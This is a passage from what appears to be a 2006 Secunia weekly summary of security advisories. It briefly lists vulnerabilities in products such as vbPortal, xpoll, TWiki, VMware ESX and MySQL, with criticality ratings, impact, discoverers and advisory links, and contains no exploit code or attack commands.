[SA21287] vbPortal "bbvbplang" Local File Inclusion Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Exposure of sensitive information, System access
Released: 2006-08-02
R00t[ATI] has reported a vulnerability in vbPortal, which can be
exploited by malicious people to disclose sensitive information and
potentially compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/21287/
--
[SA21286] Ajax Chat Cross-Site Scripting and Information Disclosure
Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting, Exposure of sensitive information
Released: 2006-07-31
Sirdarckcat has discovered two vulnerabilities in Ajax Chat, which can
be exploited by malicious people to conduct cross-site scripting
attacks and disclose sensitive information.
Full Advisory:
http://secunia.com/advisories/21286/
--
[SA21283] xpoll "poll" Parameter SQL Injection Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2006-07-31
Sirdarckcat has discovered a vulnerability in xpoll, which can be
exploited by malicious people to conduct SQL injection attacks.
Full Advisory:
http://secunia.com/advisories/21283/
--
[SA21282] X-Protection protect.php SQL Injection Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2006-07-31
Sirdarckcat has discovered some vulnerabilities in X-Protection, which
can be exploited by malicious people to conduct SQL injection attacks.
Full Advisory:
http://secunia.com/advisories/21282/
--
[SA21281] X-Statistics "User-Agent" HTTP Header SQL Injection
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2006-07-31
SirDarckCat has discovered a vulnerability in X-Statistics, which can
be exploited by malicious people to conduct SQL injection attacks.
Full Advisory:
http://secunia.com/advisories/21281/
--
[SA21267] Open Cubic Player Multiple Buffer Overflows
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2006-08-01
Luigi Auriemma has reported some vulnerabilities in Open Cubic Player,
which can be exploited by malicious people to compromise a user's
system.
Full Advisory:
http://secunia.com/advisories/21267/
--
[SA21251] Sun Java System Application Server / Web Server File
Disclosure
Critical: Moderately critical
Where: From remote
Impact: Exposure of system information, Exposure of sensitive
information
Released: 2006-07-28
A vulnerability has been reported in Sun Java System Application Server
(SJSAS) and Sun Java System Web Server (SJSWS), which can be exploited
by malicious people to gain knowledge of sensitive information.
Full Advisory:
http://secunia.com/advisories/21251/
--
[SA21301] Informix Dynamic Server Multiple Vulnerabilities
Critical: Moderately critical
Where: From local network
Impact: Exposure of sensitive information, DoS, System access
Released: 2006-08-01
Multiple vulnerabilities have been reported in Informix Dynamic Server,
which can be exploited by malicious users to cause a DoS (Denial of
Service), gain knowledge of sensitive information, or compromise the
system.
Full Advisory:
http://secunia.com/advisories/21301/
--
[SA21257] Osiris Format String Vulnerabilities
Critical: Moderately critical
Where: From local network
Impact: DoS, System access
Released: 2006-07-31
Ulf Harnhammar and Max Vozeler have reported some vulnerabilities in
Osiris, which can be exploited by malicious people to cause a DoS
(Denial of Service) or compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/21257/
--
[SA21296] AWBS Cross-Site Scripting Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-07-31
newbinaryfile has reported two vulnerabilities in AWBS, which can be
exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/21296/
--
[SA21242] Taskjitsu Cross-Site Scripting and Script Insertion
Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-07-31
Some vulnerabilities have been reported in Taskjitsu, which can be
exploited by malicious users to conduct script insertion attacks and by
malicious people to conduct cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/21242/
--
[SA21239] Dokeos Unspecified Cross-Site Scripting Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-07-28
Some vulnerabilities have been reported in Dokeos, which can be
exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/21239/
--
[SA21237] GeoClassifieds Enterprise Cross-Site Scripting
Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-07-31
Ellipsis Security reported some vulnerabilities in GeoClassifieds
Enterprise, which can be exploited by malicious people to conduct
cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/21237/
--
[SA21235] TWiki "TYPEOF" Arbitrary Command Execution Vulnerability
Critical: Less critical
Where: From remote
Impact: System access
Released: 2006-07-27
Ben Wheeler has reported a vulnerability in TWiki, which can be
exploited by malicious people to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/21235/
--
[SA21230] VMware ESX Server Multiple Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Hijacking, Cross Site Scripting, Exposure of sensitive
information
Released: 2006-08-01
Corsaire has reported some vulnerabilities in VMware ESX Server, which
can be exploited to gain knowledge of potentially sensitive information
or conduct cross-site request forgery attacks.
Full Advisory:
http://secunia.com/advisories/21230/
--
[SA21259] MySQL MERGE Table Privilege Revoke Bypass
Critical: Not critical
Where: From local network
Impact: Security Bypass
Released: 2006-08-01
Peter Gulutzan has reported a vulnerability in MySQL, which can be
exploited by malicious users to bypass certain security restrictions.
Full Advisory:
http://secunia.com/advisories/21259/
========================================================================
Secunia recommends that you verify all advisories you receive,
by clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only use
those supplied by the vendor.
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Subscribe:
http://secunia.com/secunia_weekly_summary/
Contact details:
Web : http://secunia.com/
E-mail : support@secunia.com
Tel : +45 70 20 51 44
Fax : +45 70 20 51 45
========================================================================
|
